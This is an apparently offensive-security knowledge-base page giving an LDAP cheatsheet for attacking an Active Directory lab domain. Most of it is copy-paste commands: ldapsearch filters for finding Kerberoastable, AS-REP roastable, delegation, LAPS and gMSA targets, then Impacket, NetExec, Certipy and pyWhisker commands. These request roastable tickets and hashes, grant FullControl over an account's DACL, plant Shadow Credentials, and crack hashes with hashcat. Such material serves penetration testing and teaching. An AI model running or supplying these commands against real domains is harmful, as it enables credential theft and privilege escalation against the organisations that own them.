Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / LDAP

Cheatsheet

This matrix is the fast operational map. Pick the objective, copy the filter or tool command, then pivot into the focused note only when the result needs deeper handling.

Variables:

export DC=10.10.10.200
export DOMAIN=ootw.local
export NETBIOS=OOTW
export BASE='DC=ootw,DC=local'
export USER='student'
export PASS='student'

Query Matrix:

ObjectiveLDAP filterAttributesCommand
RootDSE / base DNbase searchnamingContexts defaultNamingContext configurationNamingContextldapsearch -x -H ldap://$DC -s base -b '' namingContexts defaultNamingContext configurationNamingContext
All users(&(objectCategory=person)(objectClass=user))sAMAccountName userPrincipalName memberOf description adminCount userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -o ldif-wrap=no -b "$BASE" '(&(objectCategory=person)(objectClass=user))' sAMAccountName userPrincipalName memberOf description adminCount userAccountControl
Privileged users(&(objectCategory=person)(objectClass=user)(adminCount=1))sAMAccountName distinguishedName memberOf adminCountldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(adminCount=1))' sAMAccountName distinguishedName memberOf adminCount
Description hunting(&(objectCategory=person)(objectClass=user)(description=*))sAMAccountName description memberOfldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(description=*))' sAMAccountName description memberOf
Enabled user baseline(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))sAMAccountName distinguishedName memberOf userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -o ldif-wrap=no -b "$BASE" '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' sAMAccountName distinguishedName memberOf userAccountControl
All groups(objectClass=group)cn sAMAccountName member description adminCountldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -b "$BASE" '(objectClass=group)' cn sAMAccountName member description adminCount
Domain Admins(cn=Domain Admins)cn member memberOf adminCountldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(cn=Domain Admins)' cn member memberOf adminCount
All computers(objectCategory=computer)sAMAccountName dNSHostName operatingSystem servicePrincipalNameldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -b "$BASE" '(objectCategory=computer)' sAMAccountName dNSHostName operatingSystem servicePrincipalName
Servers(&(objectCategory=computer)(operatingSystem=*Server*))sAMAccountName dNSHostName operatingSystemldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(operatingSystem=*Server*))' sAMAccountName dNSHostName operatingSystem
Domain controllers(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))name dNSHostName operatingSystemldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' name dNSHostName operatingSystem
SPN accounts(servicePrincipalName=*)sAMAccountName servicePrincipalName memberOf adminCountldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=*)' sAMAccountName servicePrincipalName memberOf adminCount
Kerberoastable users(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))sAMAccountName servicePrincipalName memberOf adminCountldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName memberOf adminCount
AS-REP roastable users(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))sAMAccountName userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' sAMAccountName userAccountControl
Enabled Kerberoastable users(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))name sAMAccountName servicePrincipalNameldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' name sAMAccountName servicePrincipalName
Enabled AS-REP roastable users(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))name sAMAccountName userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' name sAMAccountName userAccountControl
Password never expires(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))sAMAccountName memberOf userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))' sAMAccountName memberOf userAccountControl
Disabled users(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))sAMAccountName userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' sAMAccountName userAccountControl
Unconstrained delegation(userAccountControl:1.2.840.113556.1.4.803:=524288)sAMAccountName dNSHostName servicePrincipalName userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=524288)' sAMAccountName dNSHostName servicePrincipalName userAccountControl
Constrained delegation(msDS-AllowedToDelegateTo=*)sAMAccountName servicePrincipalName msDS-AllowedToDelegateToldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToDelegateTo=*)' sAMAccountName servicePrincipalName msDS-AllowedToDelegateTo
RBCD targets(msDS-AllowedToActOnBehalfOfOtherIdentity=*)sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentityldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentity
SIDHistory(sIDHistory=*)name sAMAccountName objectSid sIDHistoryldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(sIDHistory=*)' name sAMAccountName objectSid sIDHistory
Trusts(objectClass=trustedDomain)trustPartner trustDirection trustAttributes flatNameldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=trustedDomain)' trustPartner trustDirection trustAttributes flatName
Trust accounts(samAccountType=805306370)sAMAccountName distinguishedName userAccountControlldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(samAccountType=805306370)' sAMAccountName distinguishedName userAccountControl
Foreign security principals(objectClass=foreignSecurityPrincipal)cn memberOf distinguishedNameldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=foreignSecurityPrincipal)' cn memberOf distinguishedName
GPOs(objectClass=groupPolicyContainer)displayName gPCFileSysPath gPCWQLFilterldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=groupPolicyContainer)' displayName gPCFileSysPath gPCWQLFilter
GPO links`(&((objectClass=organizationalUnit)(objectClass=domain))(gPLink=*))`objectClass name distinguishedName gPLink
WMI filters(objectClass=msWMI-Som)name msWMI-Name msWMI-Parm2ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "CN=SOM,CN=WMIPolicy,CN=System,$BASE" '(objectClass=msWMI-Som)' name msWMI-Name msWMI-Parm2
MSSQL SPNs(&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*))name sAMAccountName servicePrincipalNameldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*))' name sAMAccountName servicePrincipalName
Shadow Credentials present(msDS-KeyCredentialLink=*)sAMAccountName msDS-KeyCredentialLinkLDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-KeyCredentialLink=*)' sAMAccountName msDS-KeyCredentialLink
Legacy LAPS readable(ms-Mcs-AdmPwd=*)dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTimeLDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(ms-Mcs-AdmPwd=*)' dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
Windows LAPS readable(msLAPS-Password=*)dNSHostName msLAPS-Password msLAPS-PasswordExpirationTimeLDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msLAPS-Password=*)' dNSHostName msLAPS-Password msLAPS-PasswordExpirationTime
gMSA accounts(objectClass=msDS-GroupManagedServiceAccount)sAMAccountName msDS-GroupMSAMembership msDS-ManagedPasswordLDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=msDS-GroupManagedServiceAccount)' sAMAccountName msDS-GroupMSAMembership msDS-ManagedPassword
Deleted objects(isDeleted=TRUE)cn sAMAccountName objectClass whenDeleted msDS-LastKnownParentldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" -s sub -E '1.2.840.113556.1.4.417' '(isDeleted=TRUE)' cn sAMAccountName objectClass whenDeleted msDS-LastKnownParent
Object SID and GUID(sAMAccountName=student)objectSid objectGUIDldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(sAMAccountName=student)' objectSid objectGUID
Security descriptor attemptbase DNnTSecurityDescriptorLDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b 'CN=svc_web,OU=Service Accounts,OU=OOTW Lab,DC=ootw,DC=local' -s base nTSecurityDescriptor

Tool Matrix:

ObjectiveTool command
NetExec authenticate to LDAPnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS"
NetExec usersnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --users
NetExec groupsnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --groups
NetExec computersnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --computers
NetExec password policynxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --pwdPolicy
NetExec AdminCountnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --admin-count
NetExec Kerberoast prepnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M get-spns
NetExec AS-REP roastingnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M asreproast
NetExec delegationnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M findDelegation
NetExec RBCDnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M rbcd
NetExec trustsnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M get-trusts
NetExec ADCSnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M adcs
NetExec LAPSnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M laps
NetExec gMSAnxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M gmsa
windapsearch userspython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --users
windapsearch groupspython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --groups
windapsearch computerspython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --computers
windapsearch Domain Adminspython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --da
windapsearch SPNspython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --spns
windapsearch delegationpython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --delegate
windapsearch AS-REPpython3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --asreproast
Impacket Kerberoast ticketsGetUserSPNs.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request -outputfile kerberoast.tgs
Impacket AS-REP hashesGetNPUsers.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request -format hashcat -outputfile asrep.hashes
Impacket DACL readdacledit.py -action read -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
Impacket DACL writedacledit.py -action write -rights FullControl -principal $USER -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
Impacket owner readowneredit.py -action read -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC
Impacket SID lookuplookupsid.py $DOMAIN/$USER:"$PASS"@$DC
Certipy Shadow Credentials autocertipy shadow auto -u $USER@$DOMAIN -p "$PASS" -account svc_web -dc-ip $DC
Certipy Shadow Credentials clearcertipy shadow clear -u $USER@$DOMAIN -p "$PASS" -account svc_web -dc-ip $DC
pyWhisker add key credentialpython3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target svc_web --action add --filename svc_web
PKINITtools request TGTpython3 gettgtpkinit.py -cert-pfx svc_web.pfx -pfx-pass PFX_PASSWORD $DOMAIN/svc_web svc_web.ccache
Hashcat Kerberoast crackinghashcat -m 13100 kerberoast.tgs /usr/share/wordlists/rockyou.txt
Hashcat AS-REP crackinghashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
Apache Directory Studio interactive LDAP browsingApacheDirectoryStudio

Troubleshooting Matrix:

SymptomFix
Size limit exceededAdd -E pr=1000/noprompt
Wrapped output breaks parsingAdd -o ldif-wrap=no
Stronger authentication requiredUse -ZZ on LDAP 389 or switch to ldaps://$DC:636
LDAPS certificate fails in labPrefix with LDAPTLS_REQCERT=never
Password reset failsUse LDAPS and UTF-16LE base64 encoded quoted password
nTSecurityDescriptor emptyUse PowerView or Impacket dacledit.py
Kerberos bind failsCheck time sync, realm casing, DNS, and klist
Attribute add says value existsUse replace or delete the exact existing value first
Change disappears laterCheck adminCount and AdminSDHolder behavior